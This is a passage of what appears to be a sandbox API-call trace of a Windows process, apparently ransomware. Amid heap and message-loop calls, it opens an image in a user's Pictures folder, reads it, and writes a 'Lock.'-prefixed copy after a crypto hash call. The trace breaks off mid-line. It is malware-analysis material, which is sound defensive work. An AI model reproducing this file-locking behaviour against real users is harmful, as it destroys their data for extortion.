1 [0255.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.333] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.334] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.334] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.335] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.335] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.335] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.335] CryptDestroyHash (hHash=0xaa5760) returned 1 [0255.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FWAReLHUsSkJL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fwarelhusskjl.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0255.338] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.338] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0255.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.339] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.339] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.340] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0255.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0255.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.FWAReLHUsSkJL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.fwarelhusskjl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0255.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0255.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0255.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0255.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0255.345] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0255.346] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xbacb, lpOverlapped=0x0) returned 1 [0255.347] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0255.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbacb) returned 0x24c7a50 [0255.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0255.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0255.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0255.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0255.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbacb) returned 0x24d3528 [0255.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0255.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbacb) returned 0x24c7a50 [0255.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: 